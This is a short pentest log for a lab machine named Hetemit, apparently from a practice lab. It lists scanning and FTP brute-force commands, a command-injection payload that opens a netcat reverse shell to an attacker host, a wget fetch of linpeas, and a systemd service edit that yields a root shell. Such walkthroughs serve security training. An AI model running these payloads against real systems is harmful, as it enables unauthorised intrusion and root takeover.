Hetemit
๐งช Pentest Log: {{date:2025-08-09}}
๐ Target Information
- Machine Name: Hetemit
- IP Address: 192.168.223.117
- Operating System: Linux
ip=192.168.223.117
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
Anonymous Login
ftp anonymous@$ip
Bruteforce Common Credentials
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -6 ftp://$ip
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://$ip/ | html2markdown
Port 139,445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 18000
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://$ip/ | html2markdown
Port 50000
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
curl -s http://$ip/ | html2markdown
found two directories appeals to be functions
/generate
/verify
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 50000
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
curl -i http://$ip:50000/verify -X POST --data "code=nc 192.168.45.163 50000 -e /bin/bash"
nc -lvnp 50000
๐งฌ Privilege Escalation
๐ค Current Access
- User: cmeeks
- Groups: cmeeks
- Shell Type: reverse shell
๐ Enumeration
Linpeas:
wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
found /etc/systemd/system/pythonapp.service
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Service Binary Hijacking
- Target Binary/Service: pythonapp.service
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
ExecStart=nc 192.168.45.163 18000 -e /bin/bash
TimeoutSec=30
RestartSec=15s
User=root
- Smash to root
sudo /sbin/reboot
nc -lvnp 18000